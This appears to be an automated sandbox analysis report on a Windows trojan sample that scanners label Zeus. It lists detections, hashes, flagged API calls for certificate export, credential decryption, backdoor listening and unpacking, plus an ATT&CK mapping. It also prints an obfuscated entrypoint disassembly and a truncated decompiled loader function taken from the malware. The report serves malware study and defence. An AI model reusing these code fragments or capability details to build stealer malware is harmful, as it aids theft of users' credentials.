Play interactive tour

Edit tour

Analysis Report RFlc8JHObG

Overview

General Information

Sample Name:	RFlc8JHObG (renamed file extension from none to exe)
Analysis ID:	372416
MD5:	9babe52f985b2b4193113d5c260eb195
SHA1:	b4b4772d485d7d4192774aca3a9c594f82717adb
SHA256:	ca2ab2eb8249afceb6b9f42bac54fe8635fb5ccbf4e497c35ed700d9dae1c2d1
Tags:	unnamed9
Infos:
Most interesting Screenshot:

Detection

Score:	76
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Multi AV Scanner detection for submitted file

Machine Learning detection for sample

Antivirus or Machine Learning detection for unpacked file

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Contains functionality to enumerate network shares

Contains functionality to launch a process as a different user

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to read the PEB

Contains functionality to shutdown / reboot the system

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Detected potential crypto function

May initialize a security null descriptor

Program does not show much activity (idle)

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Classification

Startup

System is w10x64

RFlc8JHObG.exe (PID: 5988 cmdline: 'C:\Users\user\Desktop\RFlc8JHObG.exe' MD5: 9BABE52F985B2B4193113D5C260EB195)

cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus / Scanner detection for submitted sample

Show sources

Source: RFlc8JHObG.exe

Avira: detected

Multi AV Scanner detection for submitted file

Show sources

Source: RFlc8JHObG.exe	Virustotal: Detection: 84%			Perma Link
Source: RFlc8JHObG.exe	ReversingLabs: Detection: 88%

Machine Learning detection for sample

Show sources

Source: RFlc8JHObG.exe

Joe Sandbox ML: detected

Source: 1.2.RFlc8JHObG.exe.2bd0000.2.unpack	Avira: Label: TR/Kazy.MK
Source: 1.2.RFlc8JHObG.exe.400000.0.unpack	Avira: Label: TR/Kazy.MK

Source: C:\Users\user\Desktop\RFlc8JHObG.exe	Code function: 1_2_00409D29 CryptUnprotectData,LocalFree,		1_2_00409D29
Source: C:\Users\user\Desktop\RFlc8JHObG.exe	Code function: 1_2_004123AB CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,		1_2_004123AB

Compliance:

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\Users\user\Desktop\RFlc8JHObG.exe

Unpacked PE file: 1.2.RFlc8JHObG.exe.400000.0.unpack

Source: RFlc8JHObG.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source:

Binary string: T:\fbgFd\faQgZ\bvjZalie\jRgyey\zBPowcgb.pdb source: RFlc8JHObG.exe

Source: C:\Users\user\Desktop\RFlc8JHObG.exe

Code function: 1_2_004054D0 GetFileAttributesExW,ReadProcessMemory,LoadLibraryW,GetProcAddress,SHGetFolderPathW,StrCmpNIW,FreeLibrary,NetUserEnum,NetUserGetInfo,NetApiBufferFree,NetApiBufferFree,SHGetFolderPathW,

1_2_004054D0

Source: C:\Users\user\Desktop\RFlc8JHObG.exe	Code function: 1_2_0041652E PathRemoveFileSpecW,FindFirstFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,		1_2_0041652E
Source: C:\Users\user\Desktop\RFlc8JHObG.exe	Code function: 1_2_004165E9 FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,		1_2_004165E9

Source: C:\Users\user\Desktop\RFlc8JHObG.exe

Code function: 1_2_0041404D select,recv,

1_2_0041404D

Source: RFlc8JHObG.exe	String found in binary or memory: http://www.internic.net/images/internic.gif
Source: RFlc8JHObG.exe, 00000001.00000002.200757968.0000000002BD0000.00000004.00000001.sdmp	String found in binary or memory: http://www.internic.net/images/internic.gifbclih6h5h4h3h2h1divtdtrhrbr

Source: C:\Users\user\Desktop\RFlc8JHObG.exe	Code function: 1_2_0040ED74 NtCreateUserProcess,NtCreateThread,LdrLoadDll,GetFileAttributesExW,HttpSendRequestW,HttpSendRequestA,HttpSendRequestExW,HttpSendRequestExA,InternetCloseHandle,InternetReadFile,InternetReadFileExA,InternetQueryDataAvailable,HttpQueryInfoA,closesocket,send,WSASend,OpenInputDesktop,SwitchDesktop,DefWindowProcW,DefWindowProcA,DefDlgProcW,DefDlgProcA,DefFrameProcW,DefFrameProcA,DefMDIChildProcW,DefMDIChildProcA,CallWindowProcW,CallWindowProcA,RegisterClassW,RegisterClassA,RegisterClassExW,RegisterClassExA,BeginPaint,EndPaint,GetDCEx,GetDC,GetWindowDC,ReleaseDC,GetUpdateRect,GetUpdateRgn,GetMessagePos,GetCursorPos,SetCursorPos,SetCapture,ReleaseCapture,GetCapture,GetMessageW,GetMessageA,PeekMessageW,PeekMessageA,PFXImportCertStore,	1_2_0040ED74
Source: C:\Users\user\Desktop\RFlc8JHObG.exe	Code function: 1_2_0040E904 NtQueryInformationProcess,CloseHandle,NtCreateThread,	1_2_0040E904
Source: C:\Users\user\Desktop\RFlc8JHObG.exe	Code function: 1_2_0040E9BB NtCreateUserProcess,GetProcessId,GetThreadContext,SetThreadContext,VirtualFreeEx,CloseHandle,	1_2_0040E9BB

Source: C:\Users\user\Desktop\RFlc8JHObG.exe

Code function: 1_2_00412A28 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessAsUserW,CloseHandle,CloseHandle,CloseHandle,FreeLibrary,

1_2_00412A28

Source: C:\Users\user\Desktop\RFlc8JHObG.exe	Code function: 1_2_0040716E CreateMutexW,GetLastError,CloseHandle,CloseHandle,ExitWindowsEx,OpenEventW,SetEvent,CloseHandle,CloseHandle,GetFileAttributesExW,ReadProcessMemory,GetFileAttributesExW,ReadProcessMemory,Sleep,IsWellKnownSid,GetFileAttributesExW,ReadProcessMemory,GetFileAttributesExW,VirtualFree,CreateEventW,WaitForSingleObject,WaitForMultipleObjects,CloseHandle,CloseHandle,CloseHandle,CloseHandle,		1_2_0040716E
Source: C:\Users\user\Desktop\RFlc8JHObG.exe	Code function: 1_2_0040D61F InitiateSystemShutdownExW,ExitWindowsEx,		1_2_0040D61F

Source: C:\Users\user\Desktop\RFlc8JHObG.exe	Code function: 1_2_00413E5D	1_2_00413E5D
Source: C:\Users\user\Desktop\RFlc8JHObG.exe	Code function: 1_2_0040168B	1_2_0040168B
Source: C:\Users\user\Desktop\RFlc8JHObG.exe	Code function: 1_2_004122B7	1_2_004122B7
Source: C:\Users\user\Desktop\RFlc8JHObG.exe	Code function: 1_2_02442209	1_2_02442209
Source: C:\Users\user\Desktop\RFlc8JHObG.exe	Code function: 1_2_02457E13	1_2_02457E13
Source: C:\Users\user\Desktop\RFlc8JHObG.exe	Code function: 1_2_02459A29	1_2_02459A29
Source: C:\Users\user\Desktop\RFlc8JHObG.exe	Code function: 1_2_02442699	1_2_02442699
Source: C:\Users\user\Desktop\RFlc8JHObG.exe	Code function: 1_2_024590B3	1_2_024590B3
Source: C:\Users\user\Desktop\RFlc8JHObG.exe	Code function: 1_2_024595E0	1_2_024595E0
Source: C:\Users\user\Desktop\RFlc8JHObG.exe	Code function: 1_2_0244266E	1_2_0244266E
Source: C:\Users\user\Desktop\RFlc8JHObG.exe	Code function: 1_2_02442F44	1_2_02442F44
Source: C:\Users\user\Desktop\RFlc8JHObG.exe	Code function: 1_2_0245AB1C	1_2_0245AB1C
Source: C:\Users\user\Desktop\RFlc8JHObG.exe	Code function: 1_2_024413C7	1_2_024413C7
Source: C:\Users\user\Desktop\RFlc8JHObG.exe	Code function: 1_2_02459F88	1_2_02459F88
Source: C:\Users\user\Desktop\RFlc8JHObG.exe	Code function: 1_2_0245AC60	1_2_0245AC60
Source: C:\Users\user\Desktop\RFlc8JHObG.exe	Code function: 1_2_02441000	1_2_02441000
Source: C:\Users\user\Desktop\RFlc8JHObG.exe	Code function: 1_2_024598C3	1_2_024598C3
Source: C:\Users\user\Desktop\RFlc8JHObG.exe	Code function: 1_2_0245B0E3	1_2_0245B0E3
Source: C:\Users\user\Desktop\RFlc8JHObG.exe	Code function: 1_2_0245890F	1_2_0245890F
Source: C:\Users\user\Desktop\RFlc8JHObG.exe	Code function: 1_2_0245A912	1_2_0245A912
Source: C:\Users\user\Desktop\RFlc8JHObG.exe	Code function: 1_2_0245A9BA	1_2_0245A9BA

Source: RFlc8JHObG.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: RFlc8JHObG.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal76.evad.winEXE@1/0@0/0

Source: C:\Users\user\Desktop\RFlc8JHObG.exe	Code function: 1_2_0040D4F4 CertOpenSystemStoreW,CertEnumCertificatesInStore,CertDuplicateCertificateContext,CertDeleteCertificateFromStore,CertEnumCertificatesInStore,CertCloseStore,		1_2_0040D4F4
Source: C:\Users\user\Desktop\RFlc8JHObG.exe	Code function: 1_2_0040760C CertOpenSystemStoreW,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertEnumCertificatesInStore,PFXExportCertStoreEx,PFXExportCertStoreEx,PFXExportCertStoreEx,CharLowerW,GetSystemTime,CertCloseStore,		1_2_0040760C

Source: C:\Users\user\Desktop\RFlc8JHObG.exe

Code function: 1_2_004127D2 GetCurrentThread,OpenThreadToken,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,

1_2_004127D2

Source: C:\Users\user\Desktop\RFlc8JHObG.exe

Code function: 1_2_0040CC7E CloseHandle,CloseHandle,CreateToolhelp32Snapshot,Process32FirstW,OpenProcess,CloseHandle,GetLengthSid,CloseHandle,Process32NextW,CloseHandle,

1_2_0040CC7E

Source: C:\Users\user\Desktop\RFlc8JHObG.exe

Code function: 1_2_0040A448 CoCreateInstance,

1_2_0040A448

Source: C:\Users\user\Desktop\RFlc8JHObG.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: RFlc8JHObG.exe	Virustotal: Detection: 84%
Source: RFlc8JHObG.exe	ReversingLabs: Detection: 88%

Source:

Binary string: T:\fbgFd\faQgZ\bvjZalie\jRgyey\zBPowcgb.pdb source: RFlc8JHObG.exe

Data Obfuscation:

Detected unpacking (changes PE section rights)

Show sources

Source: C:\Users\user\Desktop\RFlc8JHObG.exe

Unpacked PE file: 1.2.RFlc8JHObG.exe.400000.0.unpack .text:ER;.data:EW;.itext:R;.rsrc:R;.idata:R; vs .text:ER;.data:W;.reloc:R;

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\Users\user\Desktop\RFlc8JHObG.exe

Unpacked PE file: 1.2.RFlc8JHObG.exe.400000.0.unpack

Source: C:\Users\user\Desktop\RFlc8JHObG.exe

Code function: 1_2_00414CC6 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,HeapCreate,FreeLibrary,

1_2_00414CC6

Source: C:\Users\user\Desktop\RFlc8JHObG.exe	Code function: 1_2_00401915 push es; iretd	1_2_00401924
Source: C:\Users\user\Desktop\RFlc8JHObG.exe	Code function: 1_2_00401FE1 push cs; iretd	1_2_00401FF0
Source: C:\Users\user\Desktop\RFlc8JHObG.exe	Code function: 1_2_00401FAB push cs; ret	1_2_00401FC0
Source: C:\Users\user\Desktop\RFlc8JHObG.exe	Code function: 1_2_02447857 push esi; iretd	1_2_024478AD
Source: C:\Users\user\Desktop\RFlc8JHObG.exe	Code function: 1_2_024445E5 pushfd ; iretd	1_2_024445FB

Source: initial sample	Static PE information: section name: .text entropy: 6.99040926415
Source: initial sample	Static PE information: section name: .data entropy: 7.18553169486

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\RFlc8JHObG.exe	Code function: 1_2_0041652E PathRemoveFileSpecW,FindFirstFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,		1_2_0041652E
Source: C:\Users\user\Desktop\RFlc8JHObG.exe	Code function: 1_2_004165E9 FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,		1_2_004165E9

Source: C:\Users\user\Desktop\RFlc8JHObG.exe

Code function: 1_2_0040ED74 NtCreateUserProcess,NtCreateThread,LdrLoadDll,GetFileAttributesExW,HttpSendRequestW,HttpSendRequestA,HttpSendRequestExW,HttpSendRequestExA,InternetCloseHandle,InternetReadFile,InternetReadFileExA,InternetQueryDataAvailable,HttpQueryInfoA,closesocket,send,WSASend,OpenInputDesktop,SwitchDesktop,DefWindowProcW,DefWindowProcA,DefDlgProcW,DefDlgProcA,DefFrameProcW,DefFrameProcA,DefMDIChildProcW,DefMDIChildProcA,CallWindowProcW,CallWindowProcA,RegisterClassW,RegisterClassA,RegisterClassExW,RegisterClassExA,BeginPaint,EndPaint,GetDCEx,GetDC,GetWindowDC,ReleaseDC,GetUpdateRect,GetUpdateRgn,GetMessagePos,GetCursorPos,SetCursorPos,SetCapture,ReleaseCapture,GetCapture,GetMessageW,GetMessageA,PeekMessageW,PeekMessageA,PFXImportCertStore,

1_2_0040ED74

Source: C:\Users\user\Desktop\RFlc8JHObG.exe

Code function: 1_2_00414CC6 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,HeapCreate,FreeLibrary,

1_2_00414CC6

Source: C:\Users\user\Desktop\RFlc8JHObG.exe

Code function: 1_2_004061F9 mov edx, dword ptr fs:[00000030h]

1_2_004061F9

Source: C:\Users\user\Desktop\RFlc8JHObG.exe

Code function: 1_2_00406532 GetModuleHandleW,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,HeapCreate,GetProcessHeap,InitializeCriticalSection,WSAStartup,CreateEventW,GetLengthSid,GetCurrentProcessId,

1_2_00406532

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\RFlc8JHObG.exe

Code function: 1_2_004145CF InitializeSecurityDescriptor,SetSecurityDescriptorDacl,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,LocalFree,

1_2_004145CF

Source: C:\Users\user\Desktop\RFlc8JHObG.exe

Code function: 1_2_00411208 GetSystemTime,SystemTimeToFileTime,

1_2_00411208

Source: C:\Users\user\Desktop\RFlc8JHObG.exe

Code function: 1_2_004104D7 GetTickCount,GetUserDefaultUILanguage,GetModuleFileNameW,GetUserNameExW,

1_2_004104D7

Source: C:\Users\user\Desktop\RFlc8JHObG.exe

Code function: 1_2_00411230 GetTimeZoneInformation,

1_2_00411230

Source: C:\Users\user\Desktop\RFlc8JHObG.exe

Code function: 1_2_004078CA GetProcAddress,GetVersionExW,

1_2_004078CA

Source: RFlc8JHObG.exe

Binary or memory string: S:(ML;;NRNWNX;;;LW)

Source: C:\Users\user\Desktop\RFlc8JHObG.exe	Code function: 1_2_00414400 socket,bind,closesocket,		1_2_00414400
Source: C:\Users\user\Desktop\RFlc8JHObG.exe	Code function: 1_2_00414164 socket,bind,listen,closesocket,		1_2_00414164

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts1	Native API1	Valid Accounts1	Valid Accounts1	Valid Accounts1	OS Credential Dumping	Network Share Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel2	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	System Shutdown/Reboot1
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Access Token Manipulation11	Access Token Manipulation11	LSASS Memory	System Time Discovery2	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Ingress Tool Transfer1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information2	Security Account Manager	Security Software Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Install Root Certificate1	NTDS	Process Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing23	LSA Secrets	Account Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	System Owner/User Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	File and Directory Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	System Information Discovery3	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
RFlc8JHObG.exe	85%	Virustotal		Browse
RFlc8JHObG.exe	88%	ReversingLabs	Win32.Trojan.Zeus
RFlc8JHObG.exe	100%	Avira	TR/Crypt.XPACK.Gen
RFlc8JHObG.exe	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
1.0.RFlc8JHObG.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
1.2.RFlc8JHObG.exe.2bd0000.2.unpack	100%	Avira	TR/Kazy.MK	Download File
1.2.RFlc8JHObG.exe.2440000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
1.2.RFlc8JHObG.exe.400000.0.unpack	100%	Avira	TR/Kazy.MK	Download File

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.internic.net/images/internic.gif	RFlc8JHObG.exe	false		high
http://www.internic.net/images/internic.gifbclih6h5h4h3h2h1divtdtrhrbr	RFlc8JHObG.exe, 00000001.00000002.200757968.0000000002BD0000.00000004.00000001.sdmp	false		high

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	372416
Start date:	20.03.2021
Start time:	14:07:10
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 2m 31s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	RFlc8JHObG (renamed file extension from none to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	2
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal76.evad.winEXE@1/0@0/0
EGA Information:	Failed
HDC Information:	Successful, ratio: 56.5% (good quality ratio 48%) Quality average: 71.2% Quality standard deviation: 37.2%
HCA Information:	Successful, ratio: 59% Number of executed functions: 12 Number of non-executed functions: 124
Cookbook Comments:	Adjust boot time Enable AMSI Stop behavior analysis, all processes terminated
Warnings:	Show All Exclude process from analysis (whitelisted): svchost.exe

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.186773887815174
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	RFlc8JHObG.exe
File size:	130560
MD5:	9babe52f985b2b4193113d5c260eb195
SHA1:	b4b4772d485d7d4192774aca3a9c594f82717adb
SHA256:	ca2ab2eb8249afceb6b9f42bac54fe8635fb5ccbf4e497c35ed700d9dae1c2d1
SHA512:	61f41678334ea638dd3dc02d280739910d4b64cc31289c3f99bf41067bdfee1a9ab2114920b7b162862046b06d59d2bb6168557cc1a4463113a2ad00f526af8b
SSDEEP:	3072:WhBFnGu6BYxbu75pZlgpXor85hfuHwhxqn9fI2uW+It:WhHGzK475pUpXiwgxExIt
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........9@d.j@d.j@d.j@d.jMd.jI..jQd.j[.9jOd.j[..jAd.j[..jAd.j[..jAd.jRich@d.j........PE..L....!.M...................................

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General
Entrypoint:	0x401ee0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:
Time Stamp:	0x4D8C21A2 [Fri Mar 25 05:01:22 2011 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	d2d0d8d094caedbfe934e30be29bea57

Entrypoint Preview

Instruction
xor eax, eax
xor eax, 000077A8h
push ebp
mov ebp, esp
sub esp, 10h
push esi
inc esi
mov esi, dword ptr [0043C00Ch]
and dword ptr [0040978Dh], 004097FDh
mov dword ptr [ebp-0Ch], C6F8E435h
sub dword ptr [00409741h], 00000A4Ch
push 004092F8h
mov dword ptr [ebp-0Ch], C6F8E434h
or dword ptr [0040974Dh], 0000382Ch
call esi
mov dword ptr [00409811h], 00003433h
cmp eax, 00000498h
jng 00007F2C58B3B831h
sbb dword ptr [00409805h], 004097CDh
xor eax, eax
mov dword ptr [00409811h], 00001618h
jmp 00007F2C58B3BA71h
mov dword ptr [00409861h], 00001374h
push 00409318h
or dword ptr [00409839h], 00409815h
call esi
mov dword ptr [0040974Dh], 00005BB7h
cmp eax, 00000837h
jnl 00007F2C58B3B7CBh
mov eax, dword ptr [0040977Dh]
mov eax, dword ptr [0040942Ch]
cmp eax, 919D6EFDh
mov dword ptr [0040978Dh], 00006584h
jne 00007F2C58B3B82Ah

Rich Headers

Programming Language:

[LNK] VS2010 SP1 build 40219
[RES] VS2010 SP1 build 40219
[EXP] VS2010 SP1 build 40219
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x3c014	0x257	.itext
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3e664	0x23c
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x3d000	0x8e8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x3e000	0x638	.idata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x3c000	0x14	.itext
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x7029	0x7200	False	0.791563870614	data	6.99040926415	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x9000	0x32f3e	0x17200	False	0.825274493243	data	7.18553169486	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.itext	0x3c000	0x26b	0x400	False	0.2412109375	data	3.78647081365	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x3d000	0x8e8	0xa00	False	0.459375	data	3.29475958072	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.idata	0x3e000	0x6fe	0x800	False	0.7529296875	data	6.17155304092	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_DIALOG	0x3d31c	0x27c	data	English	United States
RT_DIALOG	0x3d598	0x350	data	English	United States

Imports

DLL	Import
USER32.dll	GetWindowDC, IsCharAlphaNumericW
KERNEL32.dll	lstrlenW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

No network behavior found

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

System Behavior

Analysis Process: RFlc8JHObG.exe PID: 5988 Parent PID: 5904

General

Start time:	14:07:52
Start date:	20/03/2021
Path:	C:\Users\user\Desktop\RFlc8JHObG.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\RFlc8JHObG.exe'
Imagebase:	0x400000
File size:	130560 bytes
MD5 hash:	9BABE52F985B2B4193113D5C260EB195
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: RFlc8JHObG.exe PID: 5988 Parent PID: 5904 RFlc8JHObG.exeCOMMON

Executed Functions

Function 00406532, Relevance: 42.2, APIs: 15, Strings: 9, Instructions: 231
libraryloadermemoryCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00406532(signed int** __ecx, void* __edx, signed char _a4) {
				char _v390;
				char _v748;
				char _v756;
				char _v768;
				intOrPtr _v776;
				intOrPtr _v780;
				signed int _v784;
				intOrPtr _v788;
				signed int** _v792;
				struct HINSTANCE__* _v796;
				void* __edi;
				void* __esi;
				signed int _t40;
				struct HINSTANCE__* _t43;
				struct HINSTANCE__* _t47;
				_Unknown_base(*)()* _t53;
				void* _t54;
				signed int _t57;
				void** _t58;
				void** _t60;
				signed int _t62;
				signed int _t65;
				signed int _t66;
				signed int _t68;
				void* _t74;
				intOrPtr _t78;
				signed int _t79;
				signed int _t80;
				signed int _t81;
				struct HINSTANCE__* _t82;
				int _t84;
				signed int _t87;
				void* _t90;
				signed int* _t92;
				signed int _t96;
				WCHAR* _t98;
				void* _t99;
				signed int* _t101;
				void* _t110;
				void* _t111;
				void* _t112;
				void* _t113;

				_t90 = __edx;
				_t88 = __ecx;
				_t96 = _a4 & 0x00000001;
				_v784 = _t96;
				if(_t96 != 0) {
					_t84 = 0;
					__eflags = 0;
				} else {
					_t84 = 0;
					 *0x41e590 = 0;
				}
				_t92 = E004061F9();
				 *0x41e5a8 = _t92;
				if(_t92 == _t84) {
					L27:
					_t40 = 0;
				} else {
					if(_t96 != _t84) {
						_v784 = E00406133(_t88, _t90, _t92, "GetProcAddress");
						_v784 = E00406133(_t88, _t90, _t92, "LoadLibraryA");
						_t43 =  *0x41e5a4; // 0x400000
						_t5 = _t43 + 0x3c; // 0xd8
						_v796 = _t43;
						_t88 =  *_t5 + _t43 + 0x80;
						__eflags = _v784 - _t84;
						if(_v784 == _t84) {
							goto L21;
						} else {
							__eflags = _v780 - _t84;
							if(_v780 == _t84) {
								goto L21;
							} else {
								_t92 =  *_t88;
								__eflags = _t92 - _t84;
								if(_t92 <= _t84) {
									goto L21;
								} else {
									__eflags = _t88[1] - 0x14;
									if(_t88[1] <= 0x14) {
										goto L21;
									} else {
										_t92 = _t92 + _t43;
										__eflags =  *_t92 - _t84;
										if( *_t92 == _t84) {
											goto L21;
										} else {
											while(1) {
												_t78 = _v776(_t92[3] + _v788);
												_v776 = _t78;
												__eflags = _t78 - _t84;
												if(_t78 == _t84) {
													goto L27;
												}
												_t101 = _v792 +  *_t92;
												_t87 = _v792 + _t92[4];
												while(1) {
													_t79 =  *_t101;
													__eflags = _t79;
													if(__eflags == 0) {
														break;
